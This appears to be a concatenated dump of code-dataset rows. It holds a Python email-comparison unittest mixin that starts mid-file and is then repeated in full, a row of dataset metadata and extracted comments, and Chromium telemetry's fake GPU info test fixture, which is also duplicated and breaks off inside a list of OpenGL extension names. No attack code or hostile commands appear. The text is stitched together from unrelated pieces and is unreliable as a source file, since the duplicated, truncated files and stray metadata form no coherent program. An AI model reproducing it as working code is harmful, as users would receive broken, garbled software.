self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
| # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# file: $Id$
# auth: <NAME> <<EMAIL>>
# date: 2013/10/21
# copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved.
#------------------------------------------------------------------------------
# todo: this could be smarter... for example, it could:
# - detect when references resolve to the same content, but
# by different Content-IDs
# - detect when multipart sections could collapse to the same
# semantic structure
from __future__ import absolute_import
import unittest, email
from .util import smtpHeaderFormat
#------------------------------------------------------------------------------
def canonicalHeaders(message, ignore=None):
'''
Returns a canonical string representation of the `message` headers,
with the following changes made:
* The MIME boundary specified in the "Content-Type" header, if
specified, removed.
* Any headers listed in `ignore` are removed.
:Parameters:
ignore : list(str), optional, default: ['Content-Transfer-Encoding']
List of headers that should not be included in the canonical
form.
'''
if ignore is None:
ignore = ['Content-Transfer-Encoding']
ignore = [key.lower() for key in ignore]
hdrs = {key.lower(): '; '.join(sorted(message.get_all(key)))
for key in message.keys()
if key.lower() not in ignore}
hdrs['content-type'] = '; '.join(['='.join(filter(None, pair))
for pair in message.get_params()
if pair[0].lower() != 'boundary'])
return '\n'.join([
smtpHeaderFormat(key) + ': ' + hdrs[key]
for key in sorted(hdrs.keys())]) + '\n'
#------------------------------------------------------------------------------
def canonicalStructure(message):
ret = message.get_content_type() + '\n'
if not message.is_multipart():
return ret
msgs = message.get_payload()
for idx, msg in enumerate(msgs):
last = idx + 1 >= len(msgs)
indent = '\n|-- ' if not last else '\n '
ret += '|-- ' if not last else '`-- '
ret += indent.join(canonicalStructure(msg)[:-1].split('\n')) + '\n'
return ret
#------------------------------------------------------------------------------
def makemsg(msg, submsg):
if msg is None:
return submsg
return msg + ' (' + submsg + ')'
#------------------------------------------------------------------------------
class EmailTestMixin(object):
mime_cmp_factories = {
'text/html' : lambda self, ct: self.try_assertXmlEqual,
'text/xml' : lambda self, ct: self.try_assertXmlEqual,
'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------ | en | 0.159517 | # -*- coding: utf-8 -*- #------------------------------------------------------------------------------ # file: $Id$ # auth: <NAME> <<EMAIL>> # date: 2013/10/21 # copy: (C) Copyright 2013 Cadit Health Inc., All Rights Reserved. #------------------------------------------------------------------------------ # todo: this could be smarter... for example, it could: # - detect when references resolve to the same content, but # by different Content-IDs # - detect when multipart sections could collapse to the same # semantic structure #------------------------------------------------------------------------------ Returns a canonical string representation of the `message` headers, with the following changes made: * The MIME boundary specified in the "Content-Type" header, if specified, removed. * Any headers listed in `ignore` are removed. :Parameters: ignore : list(str), optional, default: ['Content-Transfer-Encoding'] List of headers that should not be included in the canonical form. #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #------------------------------------------------------------------------------ #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- #---------------------------------------------------------------------------- # paranoia... # /paranoia... #---------------------------------------------------------------------------- #------------------------------------------------------------------------------ # end of $Id$ #------------------------------------------------------------------------------ | 2.013546 | 2 |
telemetry/telemetry/testing/internal/fake_gpu_info.py | tingshao/catapult | 2,151 | 8008 | <reponame>tingshao/catapult<filename>telemetry/telemetry/testing/internal/fake_gpu_info.py
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
'GL_ARB_texture_compression_rgtc GL_ARB_texture_cube_map '
'GL_ARB_texture_cube_map_array GL_ARB_texture_env_add '
'GL_ARB_texture_env_combine GL_ARB_texture_env_crossbar '
'GL_ARB_texture_env_dot3 GL_ARB_texture_float '
'GL_ARB_texture_gather GL_ARB_texture_mirror_clamp_to_edge '
'GL_ARB_texture_mirrored_repeat GL_ARB_texture_multisample '
'GL_ARB_texture_non_power_of_two GL_ARB_texture_query_levels '
'GL_ARB_texture_query_lod GL_ARB_texture_rectangle '
'GL_ARB_texture_rg GL_ARB_texture_rgb10_a2ui '
'GL_ARB_texture_stencil8 GL_ARB_texture_storage '
'GL_ARB_texture_storage_multisample GL_ARB_texture_swizzle '
'GL_ARB_texture_view GL_ARB_timer_query '
'GL_ARB_transform_feedback2 GL_ARB_transform_feedback3 '
'GL_ARB_transform_feedback_instanced GL_ARB_transpose_matrix '
'GL_ARB_uniform_buffer_object GL_ARB_vertex_array_bgra '
'GL_ARB_vertex_array_object GL_ARB_vertex_attrib_64bit '
'GL_ARB_vertex_attrib_binding GL_ARB_vertex_buffer_object '
'GL_ARB_vertex_program GL_ARB_vertex_shader '
'GL_ARB_vertex_type_10f_11f_11f_rev '
'GL_ARB_vertex_type_2_10_10_10_rev GL_ARB_viewport_array '
'GL_ARB_window_pos GL_ATI_draw_buffers GL_ATI_texture_float '
'GL_ATI_texture_mirror_once GL_S3_s3tc GL_EXT_texture_env_add'
' GL_EXT_abgr GL_EXT_bgra GL_EXT_bindable_uniform '
'GL_EXT_blend_color GL_EXT_blend_equation_separate '
'GL_EXT_blend_func_separate GL_EXT_blend_minmax '
'GL_EXT_blend_subtract GL_EXT_compiled_vertex_array '
'GL_EXT_Cg_shader GL_EXT_depth_bounds_test '
'GL_EXT_direct_state_access GL_EXT_draw_buffers2 '
'GL_EXT_draw_instanced GL_EXT_draw_range_elements '
'GL_EXT_fog_coord GL_EXT_framebuffer_blit '
'GL_EXT_framebuffer_multisample '
'GL_EXTX_framebuffer_mixed_formats '
'GL_EXT_framebuffer_multisample_blit_scaled '
'GL_EXT_framebuffer_object GL_EXT_framebuffer_sRGB '
'GL_EXT_geometry_shader4 GL_EXT_gpu_program_parameters '
'GL_EXT_gpu_shader4 GL_EXT_multi_draw_arrays '
'GL_EXT_packed_depth_stencil GL_EXT_packed_float '
'GL_EXT_packed_pixels GL_EXT_pixel_buffer_object '
'GL_EXT_point_parameters GL_EXT_provoking_vertex '
'GL_EXT_rescale_normal GL_EXT_secondary_color '
'GL_EXT_separate_shader_objects '
'GL_EXT_separate_specular_color '
'GL_EXT_shader_image_load_store GL_EXT_shadow_funcs '
'GL_EXT_stencil_two_side GL_EXT_stencil_wrap GL_EXT_texture3D'
' GL_EXT_texture_array GL_EXT_texture_buffer_object '
'GL_EXT_texture_compression_dxt1 '
'GL_EXT_texture_compression_latc '
'GL_EXT_texture_compression_rgtc '
'GL_EXT_texture_compression_s3tc GL_EXT_texture_cube_map '
'GL_EXT_texture_edge_clamp GL_EXT_texture_env_combine '
'GL_EXT_texture_env_dot3 GL_EXT_texture_filter_anisotropic '
'GL_EXT_texture_integer GL_EXT_texture_lod '
'GL_EXT_texture_lod_bias GL_EXT_texture_mirror_clamp '
'GL_EXT_texture_object GL_EXT_texture_shared_exponent '
'GL_EXT_texture_sRGB GL_EXT_texture_sRGB_decode '
'GL_EXT_texture_storage GL_EXT_texture_swizzle '
'GL_EXT_timer_query GL_EXT_transform_feedback2 '
'GL_EXT_vertex_array GL_EXT_vertex_array_bgra '
'GL_EXT_vertex_attrib_64bit GL_EXT_x11_sync_object '
'GL_EXT_import_sync_object GL_IBM_rasterpos_clip '
'GL_IBM_texture_mirrored_repeat GL_KHR_debug '
'GL_KTX_buffer_region GL_NV_bindless_multi_draw_indirect '
'GL_NV_blend_equation_advanced GL_NV_blend_square '
'GL_NV_compute_program5 GL_NV_conditional_render '
'GL_NV_copy_depth_to_color GL_NV_copy_image '
'GL_NV_depth_buffer_float GL_NV_depth_clamp '
'GL_NV_draw_texture GL_NV_ES1_1_compatibility '
'GL_NV_explicit_multisample GL_NV_fence GL_NV_float_buffer '
'GL_NV_fog_distance GL_NV_fragment_program '
'GL_NV_fragment_program_option GL_NV_fragment_program2 '
'GL_NV_framebuffer_multisample_coverage '
'GL_NV_geometry_shader4 GL_NV_gpu_program4 '
'GL_NV_gpu_program4_1 GL_NV_gpu_program5 '
'GL_NV_gpu_program5_mem_extended GL_NV_gpu_program_fp64 '
'GL_NV_gpu_shader5 GL_NV_half_float GL_NV_light_max_exponent '
'GL_NV_multisample_coverage GL_NV_multisample_filter_hint '
'GL_NV_occlusion_query GL_NV_packed_depth_stencil '
'GL_NV_parameter_buffer_object GL_NV_parameter_buffer_object2'
' GL_NV_path_rendering GL_NV_pixel_data_range '
'GL_NV_point_sprite GL_NV_primitive_restart '
'GL_NV_register_combiners GL_NV_register_combiners2 '
'GL_NV_shader_atomic_counters GL_NV_shader_atomic_float '
'GL_NV_shader_buffer_load GL_NV_shader_storage_buffer_object '
'GL_ARB_sparse_texture GL_NV_texgen_reflection '
'GL_NV_texture_barrier GL_NV_texture_compression_vtc '
'GL_NV_texture_env_combine4 GL_NV_texture_expand_normal '
'GL_NV_texture_multisample GL_NV_texture_rectangle '
'GL_NV_texture_shader GL_NV_texture_shader2 '
'GL_NV_texture_shader3 GL_NV_transform_feedback '
'GL_NV_transform_feedback2 GL_NV_vdpau_interop '
'GL_NV_vertex_array_range GL_NV_vertex_array_range2 '
'GL_NV_vertex_attrib_integer_64bit '
'GL_NV_vertex_buffer_unified_memory GL_NV_vertex_program '
'GL_NV_vertex_program1_1 GL_NV_vertex_program2 '
'GL_NV_vertex_program2_option GL_NV_vertex_program3 '
'GL_NVX_conditional_render GL_NVX_gpu_memory_info '
'GL_SGIS_generate_mipmap GL_SGIS_texture_lod '
'GL_SGIX_depth_texture GL_SGIX_shadow GL_SUN_slice_accum '
},
'devices':
[
{
'device_string': '',
'vendor_id': 4318.0,
'device_id': 3576.0,
'vendor_string': ''
}],
'driver_bug_workarounds':
['clear_uniforms_before_first_program_use',
'disable_gl_path_rendering',
'init_gl_position_in_vertex_shader',
'init_vertex_attributes',
'remove_pow_with_constant_exponent',
'scalarize_vec_and_mat_constructor_args',
'use_current_program_after_successful_link',
'use_virtualized_gl_contexts']
}
| # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This dictionary of GPU information was captured from a run of
# Telemetry on a Linux workstation with NVIDIA GPU. It helps test
# telemetry.internal.platform's GPUInfo class, and specifically the
# attributes it expects to find in the dictionary; if the code changes
# in an incompatible way, tests using this fake GPU info will begin
# failing, indicating this fake data must be updated.
#
# To regenerate it, import pdb in
# telemetry/internal/platform/gpu_info.py and add a call to
# pdb.set_trace() in GPUInfo.FromDict before the return statement.
# Print the attrs dictionary in the debugger and copy/paste the result
# on the right-hand side of this assignment. Then run:
#
# pyformat [this file name] | sed -e "s/'/'/g"
#
# and put the output into this file.
FAKE_GPU_INFO = {
'feature_status':
{
'flash_stage3d': 'enabled',
'gpu_compositing': 'enabled',
'video_decode': 'unavailable_software',
'flash_3d': 'enabled',
'webgl': 'enabled',
'video_encode': 'enabled',
'multiple_raster_threads': 'enabled_on',
'2d_canvas': 'unavailable_software',
'rasterization': 'disabled_software',
'flash_stage3d_baseline': 'enabled'
},
'aux_attributes':
{
'optimus': False,
'sandboxed': True,
'basic_info_state': 1,
'adapter_luid': 0.0,
'driver_version': '331.79',
'direct_rendering': True,
'amd_switchable': False,
'context_info_state': 1,
'process_crash_count': 0,
'pixel_shader_version': '4.40',
'gl_ws_version': '1.4',
'can_lose_context': False,
'driver_vendor': 'NVIDIA',
'max_msaa_samples': '64',
'software_rendering': False,
'gl_version': '4.4.0 NVIDIA 331.79',
'gl_ws_vendor': 'NVIDIA Corporation',
'vertex_shader_version': '4.40',
'initialization_time': 1.284043,
'gl_reset_notification_strategy': 33362,
'gl_ws_extensions':
'GLX_EXT_visual_info GLX_EXT_visual_rating GLX_SGIX_fbconfig '
'GLX_SGIX_pbuffer GLX_SGI_video_sync GLX_SGI_swap_control '
'GLX_EXT_swap_control GLX_EXT_swap_control_tear '
'GLX_EXT_texture_from_pixmap GLX_EXT_buffer_age '
'GLX_ARB_create_context GLX_ARB_create_context_profile '
'GLX_EXT_create_context_es_profile '
'GLX_EXT_create_context_es2_profile '
'GLX_ARB_create_context_robustness GLX_ARB_multisample '
'GLX_NV_float_buffer GLX_ARB_fbconfig_float GLX_NV_swap_group'
' GLX_EXT_framebuffer_sRGB GLX_NV_multisample_coverage '
'GLX_NV_copy_image GLX_NV_video_capture ',
'gl_renderer': 'Quadro 600/PCIe/SSE2',
'driver_date': '',
'gl_vendor': 'NVIDIA Corporation',
'gl_extensions':
'GL_AMD_multi_draw_indirect GL_ARB_arrays_of_arrays '
'GL_ARB_base_instance GL_ARB_blend_func_extended '
'GL_ARB_buffer_storage GL_ARB_clear_buffer_object '
'GL_ARB_clear_texture GL_ARB_color_buffer_float '
'GL_ARB_compatibility GL_ARB_compressed_texture_pixel_storage'
' GL_ARB_conservative_depth GL_ARB_compute_shader '
'GL_ARB_compute_variable_group_size GL_ARB_copy_buffer '
'GL_ARB_copy_image GL_ARB_debug_output '
'GL_ARB_depth_buffer_float GL_ARB_depth_clamp '
'GL_ARB_depth_texture GL_ARB_draw_buffers '
'GL_ARB_draw_buffers_blend GL_ARB_draw_indirect '
'GL_ARB_draw_elements_base_vertex GL_ARB_draw_instanced '
'GL_ARB_enhanced_layouts GL_ARB_ES2_compatibility '
'GL_ARB_ES3_compatibility GL_ARB_explicit_attrib_location '
'GL_ARB_explicit_uniform_location '
'GL_ARB_fragment_coord_conventions '
'GL_ARB_fragment_layer_viewport GL_ARB_fragment_program '
'GL_ARB_fragment_program_shadow GL_ARB_fragment_shader '
'GL_ARB_framebuffer_no_attachments GL_ARB_framebuffer_object '
'GL_ARB_framebuffer_sRGB GL_ARB_geometry_shader4 '
'GL_ARB_get_program_binary GL_ARB_gpu_shader5 '
'GL_ARB_gpu_shader_fp64 GL_ARB_half_float_pixel '
'GL_ARB_half_float_vertex GL_ARB_imaging '
'GL_ARB_indirect_parameters GL_ARB_instanced_arrays '
'GL_ARB_internalformat_query GL_ARB_internalformat_query2 '
'GL_ARB_invalidate_subdata GL_ARB_map_buffer_alignment '
'GL_ARB_map_buffer_range GL_ARB_multi_bind '
'GL_ARB_multi_draw_indirect GL_ARB_multisample '
'GL_ARB_multitexture GL_ARB_occlusion_query '
'GL_ARB_occlusion_query2 GL_ARB_pixel_buffer_object '
'GL_ARB_point_parameters GL_ARB_point_sprite '
'GL_ARB_program_interface_query GL_ARB_provoking_vertex '
'GL_ARB_robust_buffer_access_behavior GL_ARB_robustness '
'GL_ARB_sample_shading GL_ARB_sampler_objects '
'GL_ARB_seamless_cube_map GL_ARB_separate_shader_objects '
'GL_ARB_shader_atomic_counters GL_ARB_shader_bit_encoding '
'GL_ARB_shader_draw_parameters GL_ARB_shader_group_vote '
'GL_ARB_shader_image_load_store GL_ARB_shader_image_size '
'GL_ARB_shader_objects GL_ARB_shader_precision '
'GL_ARB_query_buffer_object '
'GL_ARB_shader_storage_buffer_object GL_ARB_shader_subroutine'
' GL_ARB_shader_texture_lod GL_ARB_shading_language_100 '
'GL_ARB_shading_language_420pack '
'GL_ARB_shading_language_include '
'GL_ARB_shading_language_packing GL_ARB_shadow '
'GL_ARB_stencil_texturing GL_ARB_sync '
'GL_ARB_tessellation_shader GL_ARB_texture_border_clamp '
'GL_ARB_texture_buffer_object '
'GL_ARB_texture_buffer_object_rgb32 '
'GL_ARB_texture_buffer_range GL_ARB_texture_compression '
'GL_ARB_texture_compression_bptc '
